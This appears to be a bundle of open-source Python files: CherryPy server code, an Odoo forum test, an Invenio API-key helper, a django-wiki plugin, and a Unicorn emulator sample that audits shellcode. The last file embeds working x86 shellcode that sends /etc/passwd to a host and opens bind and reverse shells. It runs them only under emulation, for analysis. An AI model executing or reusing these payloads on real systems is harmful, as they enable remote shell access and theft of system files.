addr = ('::', 0)
conn.remote_addr = addr[0]
conn.remote_port = addr[1]
conn.ssl_env = ssl_env
self.requests.put(conn)
except socket.timeout:
# The only reason for the timeout in start() is so we can
# notice keyboard interrupts on Win32, which don't interrupt
# accept() by default
return
except socket.error:
x = sys.exc_info()[1]
if self.stats['Enabled']:
self.stats['Socket Errors'] += 1
if x.args[0] in socket_error_eintr:
# I *think* this is right. EINTR should occur when a signal
# is received during the accept() call; all docs say retry
# the call, and I *think* I'm reading it right that Python
# will then go ahead and poll for and handle the signal
# elsewhere. See http://www.cherrypy.org/ticket/707.
return
if x.args[0] in socket_errors_nonblocking:
# Just try again. See http://www.cherrypy.org/ticket/479.
return
if x.args[0] in socket_errors_to_ignore:
# Our socket was closed.
# See http://www.cherrypy.org/ticket/686.
return
raise
def _get_interrupt(self):
return self._interrupt
def _set_interrupt(self, interrupt):
self._interrupt = True
self.stop()
self._interrupt = interrupt
interrupt = property(_get_interrupt, _set_interrupt,
doc="Set this to an Exception instance to "
"interrupt the server.")
def stop(self):
"""Gracefully shutdown a server that is serving forever."""
self.ready = False
if self._start_time is not None:
self._run_time += (time.time() - self._start_time)
self._start_time = None
sock = getattr(self, "socket", None)
if sock:
if not isinstance(self.bind_addr, basestring):
# Touch our own socket to make accept() return immediately.
try:
host, port = sock.getsockname()[:2]
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
# Changed to use error code and not message
# See http://www.cherrypy.org/ticket/860.
raise
else:
# Note that we're explicitly NOT using AI_PASSIVE,
# here, because we want an actual IP to touch.
# localhost won't work if we've bound to a public IP,
# but it will if we bound to '0.0.0.0' (INADDR_ANY).
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
if hasattr(sock, "close"):
sock.close()
self.socket = None
self.requests.stop(self.shutdown_timeout)
class Gateway(object):
"""A base class to interface HTTPServer with other systems, such as WSGI."""
def __init__(self, req):
self.req = req
def respond(self):
"""Process the current request. Must be overridden in a subclass."""
raise NotImplemented
# These may either be wsgiserver.SSLAdapter subclasses or the string names
# of such classes (in which case they will be lazily loaded).
ssl_adapters = {
'builtin': 'cherrypy.wsgiserver.ssl_builtin.BuiltinSSLAdapter',
}
def get_ssl_adapter_class(name='builtin'):
"""Return an SSL adapter class for the given name."""
adapter = ssl_adapters[name.lower()]
if isinstance(adapter, basestring):
last_dot = adapter.rfind(".")
attr_name = adapter[last_dot + 1:]
mod_path = adapter[:last_dot]
try:
mod = sys.modules[mod_path]
if mod is None:
raise KeyError()
except KeyError:
# The last [''] is important.
mod = __import__(mod_path, globals(), locals(), [''])
# Let an AttributeError propagate outward.
try:
adapter = getattr(mod, attr_name)
except AttributeError:
raise AttributeError("'%s' object has no attribute '%s'"
% (mod_path, attr_name))
return adapter
# -------------------------------- WSGI Stuff -------------------------------- #
class CherryPyWSGIServer(HTTPServer):
"""A subclass of HTTPServer which calls a WSGI application."""
wsgi_version = (1, 0)
"""The version of WSGI to produce."""
def __init__(self, bind_addr, wsgi_app, numthreads=10, server_name=None,
max=-1, request_queue_size=5, timeout=10, shutdown_timeout=5):
self.requests = ThreadPool(self, min=numthreads or 1, max=max)
self.wsgi_app = wsgi_app
self.gateway = wsgi_gateways[self.wsgi_version]
self.bind_addr = bind_addr
if not server_name:
server_name = socket.gethostname()
self.server_name = server_name
self.request_queue_size = request_queue_size
self.timeout = timeout
self.shutdown_timeout = shutdown_timeout
self.clear_stats()
def _get_numthreads(self):
return self.requests.min
def _set_numthreads(self, value):
self.requests.min = value
numthreads = property(_get_numthreads, _set_numthreads)
class WSGIGateway(Gateway):
"""A base class to interface HTTPServer with WSGI."""
def __init__(self, req):
self.req = req
self.started_response = False
self.env = self.get_environ()
self.remaining_bytes_out = None
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
raise NotImplemented
def respond(self):
"""Process the current request."""
response = self.req.server.wsgi_app(self.env, self.start_response)
try:
for chunk in response:
# "The start_response callable must not actually transmit
# the response headers. Instead, it must store them for the
# server or gateway to transmit only after the first
# iteration of the application return value that yields
# a NON-EMPTY string, or upon the application's first
# invocation of the write() callable." (PEP 333)
if chunk:
if isinstance(chunk, unicodestr):
chunk = chunk.encode('ISO-8859-1')
self.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
def start_response(self, status, headers, exc_info = None):
"""WSGI callable to begin the HTTP response."""
# "The application may call start_response more than once,
# if and only if the exc_info argument is provided."
if self.started_response and not exc_info:
raise AssertionError("WSGI start_response called a second "
"time with no exc_info.")
self.started_response = True
# "if exc_info is provided, and the HTTP headers have already been
# sent, start_response must raise an error, and should raise the
# exc_info tuple."
if self.req.sent_headers:
try:
raise exc_info[0](exc_info[1]).with_traceback(exc_info[2])
finally:
exc_info = None
# According to PEP 3333, when using Python 3, the response status
# and headers must be bytes masquerading as unicode; that is, they
# must be of type "str" but are restricted to code points in the
# "latin-1" set.
if not isinstance(status, str):
raise TypeError("WSGI response status is not of type str.")
self.req.status = status.encode('ISO-8859-1')
for k, v in headers:
if not isinstance(k, str):
raise TypeError("WSGI response header key %r is not of type str." % k)
if not isinstance(v, str):
raise TypeError("WSGI response header value %r is not of type str." % v)
if k.lower() == 'content-length':
self.remaining_bytes_out = int(v)
self.req.outheaders.append((k.encode('ISO-8859-1'), v.encode('ISO-8859-1')))
return self.write
def write(self, chunk):
"""WSGI callable to write unbuffered data to the client.
This method is also used internally by start_response (to write
data from the iterable returned by the WSGI application).
"""
if not self.started_response:
raise AssertionError("WSGI write called before start_response.")
chunklen = len(chunk)
rbo = self.remaining_bytes_out
if rbo is not None and chunklen > rbo:
if not self.req.sent_headers:
# Whew. We can send a 500 to the client.
self.req.simple_response("500 Internal Server Error",
"The requested resource returned more bytes than the "
"declared Content-Length.")
else:
# Dang. We have probably already sent data. Truncate the chunk
# to fit (so the client doesn't hang) and raise an error later.
chunk = chunk[:rbo]
if not self.req.sent_headers:
self.req.sent_headers = True
self.req.send_headers()
self.req.write(chunk)
if rbo is not None:
rbo -= chunklen
if rbo < 0:
raise ValueError(
"Response body exceeds the declared Content-Length.")
class WSGIGateway_10(WSGIGateway):
"""A Gateway class to interface HTTPServer with WSGI 1.0.x."""
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
req = self.req
env = {
# set a non-standard environ entry so the WSGI app can know what
# the *real* server protocol is (and what features to support).
# See http://www.faqs.org/rfcs/rfc2145.html.
'ACTUAL_SERVER_PROTOCOL': req.server.protocol,
'PATH_INFO': req.path.decode('ISO-8859-1'),
'QUERY_STRING': req.qs.decode('ISO-8859-1'),
'REMOTE_ADDR': req.conn.remote_addr or '',
'REMOTE_PORT': str(req.conn.remote_port or ''),
'REQUEST_METHOD': req.method.decode('ISO-8859-1'),
'REQUEST_URI': req.uri,
'SCRIPT_NAME': '',
'SERVER_NAME': req.server.server_name,
# Bah. "SERVER_PROTOCOL" is actually the REQUEST protocol.
'SERVER_PROTOCOL': req.request_protocol.decode('ISO-8859-1'),
'SERVER_SOFTWARE': req.server.software,
'wsgi.errors': sys.stderr,
'wsgi.input': req.rfile,
'wsgi.multiprocess': False,
'wsgi.multithread': True,
'wsgi.run_once': False,
'wsgi.url_scheme': req.scheme.decode('ISO-8859-1'),
'wsgi.version': (1, 0),
}
if isinstance(req.server.bind_addr, basestring):
# AF_UNIX. This isn't really allowed by WSGI, which doesn't
# address unix domain sockets. But it's better than nothing.
env["SERVER_PORT"] = ""
else:
env["SERVER_PORT"] = str(req.server.bind_addr[1])
# Request headers
for k, v in req.inheaders.items():
k = k.decode('ISO-8859-1').upper().replace("-", "_")
env["HTTP_" + k] = v.decode('ISO-8859-1')
# CONTENT_TYPE/CONTENT_LENGTH
ct = env.pop("HTTP_CONTENT_TYPE", None)
if ct is not None:
env["CONTENT_TYPE"] = ct
cl = env.pop("HTTP_CONTENT_LENGTH", None)
if cl is not None:
env["CONTENT_LENGTH"] = cl
if req.conn.ssl_env:
env.update(req.conn.ssl_env)
return env
class WSGIGateway_u0(WSGIGateway_10):
"""A Gateway class to interface HTTPServer with WSGI u.0.
WSGI u.0 is an experimental protocol, which uses unicode for keys and values
in both Python 2 and Python 3.
"""
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
req = self.req
env_10 = WSGIGateway_10.get_environ(self)
env = env_10.copy()
env['wsgi.version'] = ('u', 0)
# Request-URI
env.setdefault('wsgi.url_encoding', 'utf-8')
try:
# SCRIPT_NAME is the empty string, who cares what encoding it is?
env["PATH_INFO"] = req.path.decode(env['wsgi.url_encoding'])
env["QUERY_STRING"] = req.qs.decode(env['wsgi.url_encoding'])
except UnicodeDecodeError:
# Fall back to latin 1 so apps can transcode if needed.
env['wsgi.url_encoding'] = 'ISO-8859-1'
env["PATH_INFO"] = env_10["PATH_INFO"]
env["QUERY_STRING"] = env_10["QUERY_STRING"]
return env
wsgi_gateways = {
(1, 0): WSGIGateway_10,
('u', 0): WSGIGateway_u0,
}
class WSGIPathInfoDispatcher(object):
"""A WSGI dispatcher for dispatch based on the PATH_INFO.
apps: a dict or list of (path_prefix, app) pairs.
"""
def __init__(self, apps):
try:
apps = list(apps.items())
except AttributeError:
pass
# Sort the apps by len(path), descending
apps.sort()
apps.reverse()
# The path_prefix strings must start, but not end, with a slash.
# Use "" instead of "/".
self.apps = [(p.rstrip("/"), a) for p, a in apps]
def __call__(self, environ, start_response):
path = environ["PATH_INFO"] or "/"
for p, app in self.apps:
# The apps list should be sorted by length, descending.
if path.startswith(p + "/") or path == p:
environ = environ.copy()
environ["SCRIPT_NAME"] = environ["SCRIPT_NAME"] + p
environ["PATH_INFO"] = path[len(p):]
return app(environ, start_response)
start_response('404 Not Found', [('Content-Type', 'text/plain'),
('Content-Length', '0')])
return ['']
| apache-2.0 |
allenp/odoo | addons/website_forum/tests/common.py | 13 | 3559 | # -*- coding: utf-8 -*-
from openerp.tests import common
KARMA = {
'ask': 5, 'ans': 10,
'com_own': 5, 'com_all': 10,
'com_conv_all': 50,
'upv': 5, 'dwv': 10,
'edit_own': 10, 'edit_all': 20,
'close_own': 10, 'close_all': 20,
'unlink_own': 10, 'unlink_all': 20,
'post': 100, 'flag': 500, 'moderate': 1000,
'gen_que_new': 1, 'gen_que_upv': 5, 'gen_que_dwv': -10,
'gen_ans_upv': 10, 'gen_ans_dwv': -20,
}
class TestForumCommon(common.SavepointCase):
@classmethod
def setUpClass(cls):
super(TestForumCommon, cls).setUpClass()
Forum = cls.env['forum.forum']
Post = cls.env['forum.post']
# Test users
TestUsersEnv = cls.env['res.users'].with_context({'no_reset_password': True})
group_employee_id = cls.env.ref('base.group_user').id
group_portal_id = cls.env.ref('base.group_portal').id
group_public_id = cls.env.ref('base.group_public').id
cls.user_employee = TestUsersEnv.create({
'name': 'Armande Employee',
'login': 'Armande',
'alias_name': 'armande',
'email': 'armande.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_employee_id])]
})
cls.user_portal = TestUsersEnv.create({
'name': 'Beatrice Portal',
'login': 'Beatrice',
'alias_name': 'beatrice',
'email': 'beatrice.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_portal_id])]
})
cls.user_public = TestUsersEnv.create({
'name': 'Cedric Public',
'login': 'Cedric',
'alias_name': 'cedric',
'email': 'cedric.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_public_id])]
})
# Test forum
cls.forum = Forum.create({
'name': 'TestForum',
'karma_ask': KARMA['ask'],
'karma_answer': KARMA['ans'],
'karma_comment_own': KARMA['com_own'],
'karma_comment_all': KARMA['com_all'],
'karma_answer_accept_own': 9999,
'karma_answer_accept_all': 9999,
'karma_upvote': KARMA['upv'],
'karma_downvote': KARMA['dwv'],
'karma_edit_own': KARMA['edit_own'],
'karma_edit_all': KARMA['edit_all'],
'karma_close_own': KARMA['close_own'],
'karma_close_all': KARMA['close_all'],
'karma_unlink_own': KARMA['unlink_own'],
'karma_unlink_all': KARMA['unlink_all'],
'karma_post': KARMA['post'],
'karma_comment_convert_all': KARMA['com_conv_all'],
'karma_gen_question_new': KARMA['gen_que_new'],
'karma_gen_question_upvote': KARMA['gen_que_upv'],
'karma_gen_question_downvote': KARMA['gen_que_dwv'],
'karma_gen_answer_upvote': KARMA['gen_ans_upv'],
'karma_gen_answer_downvote': KARMA['gen_ans_dwv'],
'karma_gen_answer_accept': 9999,
'karma_gen_answer_accepted': 9999,
})
cls.post = Post.create({
'name': 'TestQuestion',
'content': 'I am not a bird.',
'forum_id': cls.forum.id,
'tag_ids': [(0, 0, {'name': 'Tag2', 'forum_id': cls.forum.id})]
})
cls.answer = Post.create({
'name': 'TestAnswer',
'content': 'I am an anteater.',
'forum_id': cls.forum.id,
'parent_id': cls.post.id,
})
| gpl-3.0 |
labordoc/labordoc-next | modules/miscutil/lib/web_api_key.py | 2 | 4341 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2010, 2011, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Invenio utilities to perform a REST like authentication.
"""
from invenio.access_control_config import CFG_WEB_API_KEY_STATUS
from invenio.web_api_key_model import WebAPIKey
def create_new_web_api_key(uid, key_description=None):
"""
Creates a new pair REST API key / secret key for the user. To do that it
uses the uuid4 function.
@param uid: User's id for the new REST API key
@type uid: int
@param key_description: User's description for the REST API key
@type key_description: string
"""
WebAPIKey.create_new(uid, key_description)
def show_web_api_keys(uid, diff_status=CFG_WEB_API_KEY_STATUS['REMOVED']):
"""
Makes a query to the DB to obtain all the user's REST API keys
@param uid: User's id
@type uid: int
@param diff_status: This string indicates if the query will show
all the REST API keys or only the ones that still active (usefull in the
admin part)
@type diff_statusparam: string
"""
return WebAPIKey.show_keys(uid, diff_status)
def mark_web_api_key_as_removed(key_id):
"""
When the user wants to remove one of his key, this functions puts the status
value of that key to remove, this way the user doesn't see the key anymore
but the admin user stills see it, make statistics whit it, etc.
@param key_id: The id of the REST key that will be "removed"
@type key_id: string
"""
WebAPIKey.mark_as(key_id, CFG_WEB_API_KEY_STATUS['REMOVED'])
def get_available_web_api_keys(uid):
"""
Search for all the available REST keys, it means all the user's keys that are
not marked as REMOVED or REVOKED
@param uid: The user id
@type uid: int
@return: WebAPIKey objects
"""
return WebAPIKey.get_available(uid)
def acc_get_uid_from_request():
"""
Looks in the data base for the secret that matches with the API key in the
request. If the REST API key is found and if the signature is correct
returns the user's id.
@return: If everything goes well it returns the user's uid, it not -1
"""
return WebAPIKey.acc_get_uid_from_request()
def build_web_request(path, params=None, uid=-1, api_key=None, timestamp=True):
"""
Build a new request that uses REST authentication.
1. Add your REST API key to the params
2. Add the current timestamp to the params, if needed
3. Sort the query string params
4. Merge path and the sorted query string to a single string
5. Create a HMAC-SHA1 signature of this string
using your secret key as the key
6. Append the hex-encoded signature to your query string
@note: If the api_key parameter is None, then this method performs a search
in the data base using the uid parameter to get on of the user's REST
API key. If the user has one or more usable REST API key this method
uses the first to appear.
@param path: uri of the request until the "?" (i.e.: /search)
@type path: string
@param params: All the params of the request (i.e.: req.args or a dictionary
with the param name as key)
@type params: string or dict
@param api_key: User REST API key
@type api_key: string
@param uid: User's id to do the search for the REST API key
@type uid: int
@param timestamp: Indicates if timestamp is needed in the request
@type timestamp: boolean
@return: Signed request string or, in case of error, ''
"""
return WebAPIKey.build_web_request(path, params, uid, api_key, timestamp)
| gpl-2.0 |
a-nai/django-wiki | wiki/plugins/images/wiki_plugin.py | 2 | 3205 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from django.conf.urls import patterns, url
from django.utils.translation import ugettext as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from wiki.plugins.images import views, models, settings, forms
from wiki.plugins.notifications.settings import ARTICLE_EDIT
from wiki.plugins.notifications.util import truncate_title
from wiki.plugins.images.markdown_extensions import ImageExtension
class ImagePlugin(BasePlugin):
slug = settings.SLUG
sidebar = {
'headline': _('Images'),
'icon_class': 'fa-picture-o',
'template': 'wiki/plugins/images/sidebar.html',
'form_class': forms.SidebarForm,
'get_form_kwargs': (lambda a: {'instance': models.Image(article=a)})
}
# List of notifications to construct signal handlers for. This
# is handled inside the notifications plugin.
notifications = [
{'model': models.ImageRevision,
'message': lambda obj: _("An image was added: %s") % truncate_title(obj.get_filename()),
'key': ARTICLE_EDIT,
'created': False,
# Ignore if there is a previous revision... the image isn't new
'ignore': lambda revision: bool(revision.previous_revision),
'get_article': lambda obj: obj.article}
]
class RenderMedia:
js = [
'wiki/colorbox/jquery.colorbox-min.js',
'wiki/js/images.js',
]
css = {
'screen': 'wiki/colorbox/example1/colorbox.css'
}
urlpatterns = {'article': patterns('',
url('^$',
views.ImageView.as_view(),
name='images_index'),
url('^delete/(?P<image_id>\d+)/$',
views.DeleteView.as_view(),
name='images_delete'),
url('^restore/(?P<image_id>\d+)/$',
views.DeleteView.as_view(),
name='images_restore',
kwargs={'restore': True}),
url('^purge/(?P<image_id>\d+)/$',
views.PurgeView.as_view(),
name='images_purge'),
url('^(?P<image_id>\d+)/revision/change/(?P<rev_id>\d+)/$',
views.RevisionChangeView.as_view(),
name='images_restore'),
url('^(?P<image_id>\d+)/revision/add/$',
views.RevisionAddView.as_view(),
name='images_add_revision'),
)}
markdown_extensions = [ImageExtension()]
def __init__(self):
# print "I WAS LOADED!"
pass
registry.register(ImagePlugin)
| gpl-3.0 |
xorstream/unicorn | bindings/python/sample_network_auditing.py | 7 | 12371 | #!/usr/bin/env python
# Unicorn sample for auditing network connection and file handling in shellcode.
# Nguyen Tan Cong <shenlongbk@gmail.com>
from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *
import struct
import uuid
SIZE_REG = 4
SOCKETCALL_MAX_ARGS = 3
SOCKET_TYPES = {
1: "SOCK_STREAM",
2: "SOCK_DGRAM",
3: "SOCK_RAW",
4: "SOCK_RDM",
5: "SOCK_SEQPACKET",
10: "SOCK_PACKET"
}
ADDR_FAMILY = {
0: "AF_UNSPEC",
1: "AF_UNIX",
2: "AF_INET",
3: "AF_AX25",
4: "AF_IPX",
5: "AF_APPLETALK",
6: "AF_NETROM",
7: "AF_BRIDGE",
8: "AF_AAL5",
9: "AF_X25",
10: "AF_INET6",
12: "AF_MAX"
}
# http://shell-storm.org/shellcode/files/shellcode-861.php
X86_SEND_ETCPASSWD = b"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
# http://shell-storm.org/shellcode/files/shellcode-882.php
X86_BIND_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
# http://shell-storm.org/shellcode/files/shellcode-883.php
X86_REVERSE_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# http://shell-storm.org/shellcode/files/shellcode-849.php
X86_REVERSE_TCP_2 = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\xc0\xa8\x01\x0a\x66\x68\x7a\x69\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"
# memory address where emulation starts
ADDRESS = 0x1000000
# supported classes
class IdGenerator:
def __init__(self):
self.__next_id = 3 # exclude sdtin, stdout, stderr
def next(self):
next_id = self.__next_id
self.__next_id += 1
return next_id
class LogChain:
def __init__(self):
self.__chains = {}
self.__linking_fds = {}
def clean(self):
self.__chains = {}
self.__linking_fds = {}
def create_chain(self, my_id):
if not my_id in self.__chains:
self.__chains[my_id] = []
else:
print("LogChain: id %d existed" % my_id)
def add_log(self, id, msg):
fd = self.get_original_fd(id)
if fd is not None:
self.__chains[fd].append(msg)
else:
print("LogChain: id %d doesn't exist" % id)
def link_fd(self, from_fd, to_fd):
if not to_fd in self.__linking_fds:
self.__linking_fds[to_fd] = []
self.__linking_fds[to_fd].append(from_fd)
def get_original_fd(self, fd):
if fd in self.__chains:
return fd
for orig_fd, links in self.__linking_fds.items():
if fd in links:
return orig_fd
return None
def print_report(self):
print("""
----------------
| START REPORT |
----------------
""")
for my_id, logs in self.__chains.items():
print("---- START FD(%d) ----" % my_id)
print("\n".join(logs))
print("---- END FD(%d) ----" % my_id)
print("""
--------------
| END REPORT |
--------------
""")
# end supported classes
# utilities
def bin_to_ipv4(ip):
return "%d.%d.%d.%d" % (
(ip & 0xff000000) >> 24,
(ip & 0xff0000) >> 16,
(ip & 0xff00) >> 8,
(ip & 0xff))
def read_string(uc, addr):
ret = ""
c = uc.mem_read(addr, 1)[0]
read_bytes = 1
while c != 0x0:
ret += chr(c)
c = uc.mem_read(addr + read_bytes, 1)[0]
read_bytes += 1
return ret
def parse_sock_address(sock_addr):
sin_family, = struct.unpack("<h", sock_addr[:2])
if sin_family == 2: # AF_INET
port, host = struct.unpack(">HI", sock_addr[2:8])
return "%s:%d" % (bin_to_ipv4(host), port)
elif sin_family == 6: # AF_INET6
return ""
def print_sockcall(msg):
print(">>> SOCKCALL %s" % msg)
# end utilities
# callback for tracing instructions
def hook_code(uc, address, size, user_data):
print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))
# read this instruction code from memory
tmp = uc.mem_read(address, size)
print(">>> Instruction code at [0x%x] =" % (address), end="")
for i in tmp:
print(" %x" % i, end="")
print("")
# callback for tracing Linux interrupt
def hook_intr(uc, intno, user_data):
global id_gen
# only handle Linux syscall
if intno != 0x80:
return
eax = uc.reg_read(UC_X86_REG_EAX)
ebx = uc.reg_read(UC_X86_REG_EBX)
ecx = uc.reg_read(UC_X86_REG_ECX)
edx = uc.reg_read(UC_X86_REG_EDX)
eip = uc.reg_read(UC_X86_REG_EIP)
# print(">>> INTERRUPT %d" % eax)
if eax == 1: # sys_exit
print(">>> SYS_EXIT")
uc.emu_stop()
elif eax == 3: # sys_read
fd = ebx
buf = ecx
count = edx
dummy_content = str(uuid.uuid1()).encode("latin1")[:32]
if len(dummy_content) > count:
dummy_content = dummy_content[:count]
uc.mem_write(buf, dummy_content)
msg = "read %d bytes from fd(%d) with dummy_content(%s)" % (count, fd, dummy_content)
fd_chains.add_log(fd, msg)
print(">>> %s" % msg)
elif eax == 4: # sys_write
fd = ebx
buf = ecx
count = edx
content = uc.mem_read(buf, count)
msg = "write data=%s count=%d to fd(%d)" % (content, count, fd)
print(">>> %s" % msg)
fd_chains.add_log(fd, msg)
elif eax == 5: # sys_open
filename_addr = ebx
flags = ecx
mode = edx
filename = read_string(uc, filename_addr)
dummy_fd = id_gen.next()
uc.reg_write(UC_X86_REG_EAX, dummy_fd)
msg = "open file (filename=%s flags=%d mode=%d) with fd(%d)" % (filename, flags, mode, dummy_fd)
fd_chains.create_chain(dummy_fd)
fd_chains.add_log(dummy_fd, msg)
print(">>> %s" % msg)
elif eax == 11: # sys_execv
# print(">>> ebx=0x%x, ecx=0x%x, edx=0x%x" % (ebx, ecx, edx))
filename = read_string(uc, ebx)
print(">>> SYS_EXECV filename=%s" % filename)
elif eax == 63: # sys_dup2
fd_chains.link_fd(ecx, ebx)
print(">>> SYS_DUP2 oldfd=%d newfd=%d" % (ebx, ecx))
elif eax == 102: # sys_socketcall
# ref: http://www.skyfree.org/linux/kernel_network/socket.html
call = uc.reg_read(UC_X86_REG_EBX)
args = uc.reg_read(UC_X86_REG_ECX)
SOCKETCALL_NUM_ARGS = {
1: 3, # sys_socket
2: 3, # sys_bind
3: 3, # sys_connect
4: 2, # sys_listen
5: 3, # sys_accept
9: 4, # sys_send
11: 4, # sys_receive
13: 2 # sys_shutdown
}
buf = uc.mem_read(args, SOCKETCALL_NUM_ARGS[call] * SIZE_REG)
args = struct.unpack("<" + "I" * SOCKETCALL_NUM_ARGS[call], buf)
# int sys_socketcall(int call, unsigned long *args)
if call == 1: # sys_socket
# err = sys_socket(a0,a1,a[2])
# int sys_socket(int family, int type, int protocol)
family = args[0]
sock_type = args[1]
protocol = args[2]
dummy_fd = id_gen.next()
uc.reg_write(UC_X86_REG_EAX, dummy_fd)
if family == 2: # AF_INET
msg = "create socket (%s, %s) with fd(%d)" % (ADDR_FAMILY[family], SOCKET_TYPES[sock_type], dummy_fd)
fd_chains.create_chain(dummy_fd)
fd_chains.add_log(dummy_fd, msg)
print_sockcall(msg)
elif family == 3: # AF_INET6
pass
elif call == 2: # sys_bind
fd = args[0]
umyaddr = args[1]
addrlen = args[2]
sock_addr = uc.mem_read(umyaddr, addrlen)
msg = "fd(%d) bind to %s" % (fd, parse_sock_address(sock_addr))
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 3: # sys_connect
# err = sys_connect(a0, (struct sockaddr *)a1, a[2])
# int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen)
fd = args[0]
uservaddr = args[1]
addrlen = args[2]
sock_addr = uc.mem_read(uservaddr, addrlen)
msg = "fd(%d) connect to %s" % (fd, parse_sock_address(sock_addr))
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 4: # sys_listen
fd = args[0]
backlog = args[1]
msg = "fd(%d) listened with backlog=%d" % (fd, backlog)
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 5: # sys_accept
fd = args[0]
upeer_sockaddr = args[1]
upeer_addrlen = args[2]
# print(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d" % (upeer_sockaddr, upeer_addrlen))
if upeer_sockaddr == 0x0:
print_sockcall("fd(%d) accept client" % fd)
else:
upeer_len, = struct.unpack("<I", uc.mem_read(upeer_addrlen, 4))
sock_addr = uc.mem_read(upeer_sockaddr, upeer_len)
msg = "fd(%d) accept client with upeer=%s" % (fd, parse_sock_address(sock_addr))
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 9: # sys_send
fd = args[0]
buff = args[1]
length = args[2]
flags = args[3]
buf = uc.mem_read(buff, length)
msg = "fd(%d) send data=%s" % (fd, buf)
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 11: # sys_receive
fd = args[0]
ubuf = args[1]
size = args[2]
flags = args[3]
msg = "fd(%d) is gonna receive data with size=%d flags=%d" % (fd, size, flags)
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 13: # sys_shutdown
fd = args[0]
how = args[1]
msg = "fd(%d) is shutted down because of %d" % (fd, how)
fd_chains.add_log(fd, msg)
print_sockcall(msg)
# Test X86 32 bit
def test_i386(code):
global fd_chains
fd_chains.clean()
print("Emulate i386 code")
try:
# Initialize emulator in X86-32bit mode
mu = Uc(UC_ARCH_X86, UC_MODE_32)
# map 2MB memory for this emulation
mu.mem_map(ADDRESS, 2 * 1024 * 1024)
# write machine code to be emulated to memory
mu.mem_write(ADDRESS, code)
# initialize stack
mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000)
# tracing all instructions with customized callback
# mu.hook_add(UC_HOOK_CODE, hook_code)
# handle interrupt ourself
mu.hook_add(UC_HOOK_INTR, hook_intr)
# emulate machine code in infinite time
mu.emu_start(ADDRESS, ADDRESS + len(code))
# now print out some registers
print(">>> Emulation done")
except UcError as e:
print("ERROR: %s" % e)
